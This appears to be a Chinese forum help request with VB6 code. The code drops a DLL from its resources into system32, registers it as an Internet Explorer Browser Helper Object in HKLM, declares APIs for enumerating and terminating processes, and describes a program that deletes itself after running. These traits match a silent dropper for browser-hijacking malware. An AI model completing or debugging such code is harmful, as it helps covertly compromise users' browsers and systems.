有一个DLL、我通过以下方法从RES中释放到system32下了Private Sub shifang() On Error Resume Next Dim strSysPath As String Dim strDesPath As String Dim binBuffer() As Byte strDesPath = "c:\windows\system32\" & "project.dll" If Dir(strDesPath) <> "" Then Exit Sub End If binBuffer = LoadResData(101, "CUSTOM") Open strDesPath For Binary As #1 Put #1, , binBuffer Close #1 End Sub还有发现很多时候修改注册表不成功、不怎么稳定~比如: Dim wsh As New WshShell wsh.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\" + clisd + "\", Null有某些操作系统(如XP SP3下)程序根本不执行该语句....还望前辈和高手们指点~~~~
另外、我把 引用一部份贴出来~供大家帮我分析Dim wsh As New WshShell Dim ta As New TLI.TLIApplication, ti As TLI.TypeLibInfo, tc As TLI.CoClassInfo Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long Private Const PROCESS_ALL_ACCESS = &H1F0FFF '*--- reg --- Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Const HKEY_LOCAL_MACHINE = &H80000002 Private Const REG_DWORD = 4 Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long '*--- *** --- Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal ApphProcess As Long, ByVal uExitCode As Long) As Long Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * 1024 End Type Const TH32CS_SNAPHEAPLIST = &H1 Const TH32CS_SNAPPROCESS = &H2 Const TH32CS_SNAPTHREAD = &H4 Const TH32CS_SNAPMODULE = &H8 Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE) Const TH32CS_INHERIT = &H80000000前提说明一下,该程序是个绿色软件~~~ 50K左右~~~~运行完成,实现自删除
On Error Resume Next
Dim strSysPath As String
Dim strDesPath As String
Dim binBuffer() As Byte
strDesPath = "c:\windows\system32\" & "project.dll"
If Dir(strDesPath) <> "" Then
Exit Sub
End If
binBuffer = LoadResData(101, "CUSTOM")
Open strDesPath For Binary As #1
Put #1, , binBuffer
Close #1
End Sub还有发现很多时候修改注册表不成功、不怎么稳定~比如:
Dim wsh As New WshShell
wsh.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\" + clisd + "\", Null有某些操作系统(如XP SP3下)程序根本不执行该语句....还望前辈和高手们指点~~~~
Dim ta As New TLI.TLIApplication, ti As TLI.TypeLibInfo, tc As TLI.CoClassInfo
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
'*--- reg ---
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_DWORD = 4
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
'*--- *** ---
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal ApphProcess As Long, ByVal uExitCode As Long) As Long
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 1024
End Type
Const TH32CS_SNAPHEAPLIST = &H1
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000前提说明一下,该程序是个绿色软件~~~ 50K左右~~~~运行完成,实现自删除